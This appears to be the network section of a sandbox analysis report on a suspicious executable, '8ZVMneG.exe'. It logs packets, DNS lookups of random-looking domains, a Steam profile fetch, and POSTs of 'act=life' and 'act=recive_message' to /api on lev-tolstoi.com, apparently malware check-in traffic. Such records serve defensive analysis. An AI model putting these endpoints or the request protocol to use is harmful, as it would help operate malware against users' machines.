                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.660938978 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661484957 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661506891 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661639929 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661676884 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661825895 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661853075 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.661879063 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.662038088 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.662062883 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.707329035 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.707446098 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.707487106 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.707535028 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.755331039 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.755470037 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.755517960 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.755537033 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.803335905 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.804785967 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:29.847333908 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:30.022654057 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.957848072 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.958086967 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.958138943 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.958245039 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.958262920 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.986852884 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.986943007 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.987020016 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.987356901 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:31.987391949 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.207181931 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.207297087 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.208425999 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.208436012 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.208852053 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.211857080 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.211885929 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.211940050 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.968821049 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.968931913 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.968986034 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969094992 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969105959 CET44349781104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969120979 CET49781443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:33.969125986 CET44349781104.21.66.86192.168.2.6

                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:01.704511881 CET6456353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:02.020720005 CET53645631.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:02.024945974 CET5802253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.018352032 CET5802253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.286108017 CET53580221.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.287022114 CET53580221.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.333755016 CET5111053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.343594074 CET5111053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608409882 CET53511101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608872890 CET53511101.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.719711065 CET5980053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.021348953 CET53598001.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.024667025 CET4966453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.248236895 CET53496641.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.249701977 CET6134553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.469168901 CET53613451.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.472443104 CET6153053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.689680099 CET53615301.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.691346884 CET5563353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.909045935 CET53556331.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.910772085 CET5486253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.213623047 CET53548621.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.217242002 CET5424653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.355187893 CET53542461.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.893002987 CET5306053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.122935057 CET53530601.1.1.1192.168.2.6

                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:01.704511881 CET192.168.2.61.1.1.10xb91Standard query (0)bellflamre.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:02.024945974 CET192.168.2.61.1.1.10x5b7fStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.018352032 CET192.168.2.61.1.1.10x5b7fStandard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:05.333755016 CET192.168.2.61.1.1.10x6eb2Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.343594074 CET192.168.2.61.1.1.10x6eb2Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:08.719711065 CET192.168.2.61.1.1.10x8c12Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.024667025 CET192.168.2.61.1.1.10x15c4Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.249701977 CET192.168.2.61.1.1.10x881dStandard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.472443104 CET192.168.2.61.1.1.10xae18Standard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.691346884 CET192.168.2.61.1.1.10x6653Standard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.910772085 CET192.168.2.61.1.1.10x72d7Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.217242002 CET192.168.2.61.1.1.10xe940Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:12.893002987 CET192.168.2.61.1.1.10x321cStandard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:02.020720005 CET1.1.1.1192.168.2.60xb91Name error (3)bellflamre.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.286108017 CET1.1.1.1192.168.2.60x5b7fNo error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.286108017 CET1.1.1.1192.168.2.60x5b7fNo error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.286108017 CET1.1.1.1192.168.2.60x5b7fNo error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.287022114 CET1.1.1.1192.168.2.60x5b7fNo error (0)immureprech.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.287022114 CET1.1.1.1192.168.2.60x5b7fNo error (0)immureprech.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:03.287022114 CET1.1.1.1192.168.2.60x5b7fNo error (0)immureprech.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608409882 CET1.1.1.1192.168.2.60x6eb2No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608409882 CET1.1.1.1192.168.2.60x6eb2No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608409882 CET1.1.1.1192.168.2.60x6eb2No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608872890 CET1.1.1.1192.168.2.60x6eb2No error (0)deafeninggeh.biz178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608872890 CET1.1.1.1192.168.2.60x6eb2No error (0)deafeninggeh.biz104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:06.608872890 CET1.1.1.1192.168.2.60x6eb2No error (0)deafeninggeh.biz45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.021348953 CET1.1.1.1192.168.2.60x8c12Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.248236895 CET1.1.1.1192.168.2.60x15c4Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.469168901 CET1.1.1.1192.168.2.60x881dName error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.689680099 CET1.1.1.1192.168.2.60xae18Name error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:09.909045935 CET1.1.1.1192.168.2.60x6653Name error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.213623047 CET1.1.1.1192.168.2.60x72d7Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:10.355187893 CET1.1.1.1192.168.2.60xe940No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.122935057 CET1.1.1.1192.168.2.60x321cNo error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 20, 2024 07:04:13.122935057 CET1.1.1.1192.168.2.60x321cNo error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                • immureprech.biz
                                                                                                                                                                                                                                                                • deafeninggeh.biz
                                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                                • lev-tolstoi.com

                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.649708178.62.201.344432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:04 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                Host: immureprech.biz
                                                                                                                                                                                                                                                                2024-12-20 06:04:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                2024-12-20 06:04:05 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:05 GMT
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                1192.168.2.649710178.62.201.344432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:08 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                Host: deafeninggeh.biz
                                                                                                                                                                                                                                                                2024-12-20 06:04:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                2024-12-20 06:04:08 UTC94INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:08 GMT
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.64972123.55.153.1064432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:12 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:12 GMT
                                                                                                                                                                                                                                                                Content-Length: 35121
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: sessionid=9141f4cafee052551e41627d; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                2024-12-20 06:04:12 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                2024-12-20 06:04:12 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                2024-12-20 06:04:12 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                3192.168.2.649730104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:14 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                2024-12-20 06:04:15 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:15 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=mgtccgkpjpkcs0hk7sv4ukjech; expires=Mon, 14 Apr 2025 23:50:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZA9Jn%2Bdea2tFIz3F1bqirqmh08VVhXojEJmgIqopFyA33ixIgZ7kqU2nE1glmqdamEOVQ%2FJjqRkfADn3chVwrZBBhIWmmFROW0DeJ6rBvZabHgBbzVSEeXE4Rr%2FgVzN9Dnw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                CF-RAY: 8f4d6f103aa832c7-EWR
                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1811&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1596500&cwnd=138&unsent_bytes=0&cid=f0ee5beb679843cc&ts=1207&x=0"
                                                                                                                                                                                                                                                                2024-12-20 06:04:15 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                                                2024-12-20 06:04:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                4192.168.2.649737104.21.66.864432144C:\Users\user\Desktop\8ZVMneG.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-20 06:04:16 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Length: 54
                                                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                2024-12-20 06:04:16 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 6e 62 67 6e 78 64 6c 78 64 6e 79 6f 26 6a 3d
                                                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--nbgnxdlxdnyo&j=
                                                                                                                                                                                                                                                                2024-12-20 06:04:17 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:04:17 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
